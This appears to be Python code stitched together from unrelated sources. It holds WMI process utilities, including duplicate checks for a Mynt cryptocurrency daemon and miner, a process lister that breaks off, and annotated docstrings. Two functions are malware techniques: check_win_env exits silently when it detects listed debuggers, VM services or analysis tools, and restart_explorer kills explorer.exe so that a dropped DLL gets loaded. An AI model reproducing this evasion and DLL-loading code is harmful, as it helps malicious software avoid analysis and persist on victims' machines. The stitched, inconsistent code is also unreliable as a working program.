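def runningcheck():
    """Report whether the Mynt daemon, wallet CLI and miner are running.

    Returns:
        tuple[bool, bool, bool]: ``(daemonrunning, walletrunning, minerrunning)``.

    On Windows the check enumerates ``Win32_Process`` through WMI and compares
    exact image names.  On Linux/macOS it scans the output of ``ps -A`` for the
    process names as substrings (so ``minerd`` also matches any longer command
    name containing it, exactly as before).  Relies on ``platform`` (sys.platform)
    and ``subprocess`` being imported at module level.
    """
    daemonrunning, walletrunning, minerrunning = False, False, False
    if platform == 'win32':
        import wmi
        # Bind the connection to its own name instead of shadowing the module.
        conn = wmi.WMI()
        for process in conn.Win32_Process():
            if process.Name == 'myntd.exe':
                daemonrunning = True
            elif process.Name == 'mynt-wallet-cli.exe':
                walletrunning = True
            elif process.Name == 'minerd.exe':
                minerrunning = True
    elif platform in ('linux', 'linux2', 'darwin'):
        try:
            # Argument list, no shell: the command is constant, but shell=False
            # removes the shell round-trip and any future interpolation hazard.
            p = subprocess.Popen(["ps", "-A"],
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
        except OSError:
            # ps missing/unrunnable: same observable result as the old shell
            # invocation (empty output -> nothing reported as running).
            return daemonrunning, walletrunning, minerrunning
        output, _ = p.communicate()
        # communicate() returns bytes on Python 3; the original substring tests
        # would raise TypeError there, so decode first.
        output = output.decode("utf-8", "replace")
        daemonrunning = 'myntd' in output
        walletrunning = 'mynt-wallet-cli' in output
        minerrunning = 'minerd' in output
    return daemonrunning, walletrunning, minerrunning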
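def terminate(self, processname):
    """Terminate the first ``Win32_Process`` whose ``Caption`` equals ``processname``.

    Args:
        processname: exact image name compared (case-sensitively) against
            ``Win32_Process.Caption``.

    Returns:
        True when a matching process was found and ``Terminate`` did not raise,
        False when the call raised or when no process matched.  The original
        fell off the end of the loop (returning None) in the no-match case;
        None and False are both falsy, so callers testing truthiness see no
        difference, but the return type is now consistent.

    ``wmi`` is taken from module scope; it is presumably a ``wmi.WMI()``
    connection object, not the bare module — confirm against the file header.
    """
    for process in wmi.Win32_Process():
        if process.Caption != processname:
            continue
        try:
            # NOTE(review): Win32_Process.Terminate's single parameter is an
            # exit-code "Reason"; passing ParentProcessId is kept as-is for
            # compatibility but looks unintended — confirm before changing.
            process.Terminate(process.ParentProcessId)
        except Exception:
            return False
        return True
    return False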
def restart_explorer():
    """ Once the DLL is dropped we can either wait for a reboot or just kill the process, the process should auto-restart and after a while the DLL gets loaded

    Enumerates ``Win32_Process`` through the module-level ``wmi`` object
    (presumably a ``wmi.WMI()`` connection — confirm against the file header)
    and calls ``Terminate`` on every process whose ``Caption`` is
    ``"explorer.exe"``.

    Returns False if any exception is raised during enumeration or
    termination; otherwise falls off the end and returns None, so a
    truthiness test on the result cannot distinguish "done" from "failed".

    From a monitoring standpoint, a ``Win32_Process.Terminate`` issued
    against explorer.exe over WMI is an unusual, loggable event.
    """
    try:
        for process in wmi.Win32_Process():
            if (process.Caption == "explorer.exe"):
                # NOTE(review): Terminate's parameter is an exit-code "Reason";
                # ParentProcessId is passed here, which looks unintended.
                process.Terminate(process.ParentProcessId)
    except Exception as error:
        # `error` is captured but never used; any failure maps to False.
        return False
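def runningcheck():
    """Return True when a ``myntd`` daemon process is running.

    Windows: filters ``Win32_Process`` by image name through WMI, so any
    row returned means the daemon is up.  Linux: scans ``ps -A`` output for
    ``myntd`` as a substring (equivalent to the previous ``ps -A | grep myntd``
    pipeline, which reported "running" for any line containing the name).

    Returns:
        bool

    Relies on ``platform`` (sys.platform) and ``sub`` (the subprocess module)
    being imported at module level.
    """
    daemonrunning = False
    if platform == 'win32':
        import wmi
        # Bind the connection to its own name instead of shadowing the module.
        conn = wmi.WMI()
        # The name filter already restricts the result set; one hit is enough.
        for _ in conn.Win32_Process(name='myntd.exe'):
            daemonrunning = True
            break
    elif platform in ('linux', 'linux2', 'linux32'):
        try:
            # Argument list, no shell: the command is constant, but dropping
            # the shell pipeline removes the extra process and any future
            # interpolation hazard.
            p = sub.Popen(["ps", "-A"], stdout=sub.PIPE, stderr=sub.PIPE)
        except OSError:
            # ps missing/unrunnable: the shell version produced empty output
            # here and reported "not running"; keep that result.
            return daemonrunning
        output, _ = p.communicate()
        # communicate() returns bytes; compare against a bytes literal so this
        # works unchanged on Python 3.
        daemonrunning = b'myntd' in output
    return daemonrunning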
def check_win_env():
    """Heuristic sandbox/analysis-environment check for Windows hosts.

    Two checks run in sequence: (1) the names of running processes are
    compared against a list of virtualisation and analysis-tool image names;
    (2) ``IsDebuggerPresent`` is queried through ctypes.  With the
    module-level ``debug`` flag set, a hit returns a descriptive string;
    otherwise the interpreter exits via ``sys.exit()``.  When neither check
    fires the function returns None.

    This is the classic evasion pattern seen in malicious samples; for
    defenders, the observable footprint is a WMI ``Win32_Process``
    enumeration followed immediately by process exit.

    Depends on module-level ``debug``, ``ctypes`` and ``sys``.
    """
    # Are we in a VM?
    try:
        import wmi
    except:
        # Bare except: also swallows KeyboardInterrupt/SystemExit during import.
        return ("[!]Import issue with WMI")
    ProcessList = ["ollydbg.exe","ProcessHacker.exe","vmsrvc.exe",
                   "fiddler.exe","tcpview.exe","vmware.exe","vbox.exe","vmvss.exe",
                   "vmscsi.exe","vmhgfs.exe","vboxservice.exe","vmxnet.exe","vmx_svga.exe",
                   "df5serv.exe","vmmemctl.exe","autoruns.exe","autorunsc.exe","vmusbmouse.exe",
                   "filemon.exe","procmon.exe","vmtools.exe","regmon.exe","vboxtray.exe","procexp.exe",
                   "vmrawdsk.exe","idaq.exe","idaq64.exe","ImmunityDebugger.exe","Wireshark.exe",
                   "dumpcap.exe","HookExplorer.exe","ImportREC.exe","PETools.exe","LordPE.exe",
                   "SysInspector.exe","proc_analyzer.exe","sysAnalyzer.exe","sniff_hit.exe","windbg.exe",
                   "joeboxcontrol.exe","joeboxserver.exe","vmtoolsd.exe","vmwaretray.exe","vmwareuser.exe",
                   "vmusrvc.exe","prl_cc.exe","prl_tools.exe","xenservice.exe"]
    try:
        # Win32_Process is looked up on the imported `wmi` name directly (no
        # WMI() connection is created here).
        for process in wmi.Win32_Process():
            for processName in ProcessList:
                # find(...) == 0 is a prefix test on the lower-cased process name.
                if (process.Name.lower().find(processName) == 0):
                    if debug == True:
                        return ("[!]It is likely we are in a VM.")
                    else:
                        # Stop executing
                        sys.exit()
                else:
                    pass
    except Exception as e:
        # Any failure during enumeration is reported only in debug mode;
        # otherwise it is swallowed and the check is effectively inert.
        if debug == True:
            return e
        else:
            pass
    # Is there a debugger present?
    debug_present = ctypes.windll.kernel32.IsDebuggerPresent()
    if debug_present and debug == True:
        return ("[!]A debugger appears to be present")
    elif debug_present:
        # Stop executing
        sys.exit()
    else:
        pass
def kaboom():
    """Print a table of running processes gathered through WMI ``Win32_Process``.

    Per process this excerpt collects the executable path (intended as input
    for a SHA1 hash), the creation timestamp and the owner; the function
    appears to continue beyond this excerpt (the row print and hashing are
    not visible here).  Python 2 ``print`` statement syntax is used.

    Depends on module-level ``wmi`` (presumably a ``wmi.WMI()`` connection —
    confirm) and declares the globals ``hash`` (which shadows the builtin)
    and ``processExploder``.
    """
    global hash
    global processExploder
    print "****** Process Exploder ******\n"
    print "|-- Start Time --|-- PID --|-- Process Name --|-- Domain\User --|-- Path & Run Command --|-- Handle & Thread Count --|-- SHA1 Hash --|\n"
    for processExploder in wmi.Win32_Process():
        path = processExploder.ExecutablePath # Get the process path. This is used to create a SHA1 hash.
        date = processExploder.CreationDate # Get the timestamp for when a process is created.
        date = str(date)
        # Presumably a CIM datetime string (yyyymmddHHMMSS.ffffff+UUU); the first
        # 14 characters keep the date/time and drop the fraction and UTC offset.
        date = date[:14]
        try:
            z = processExploder.GetOwner() # Get the owner info for a process
            z = "{0}\{1}" .format(z[0], z[2]) # Display only domain and username
        except Exception:
            z = " Unknown " # If a process is closed while running this script, the GetOwner method will throw an exception.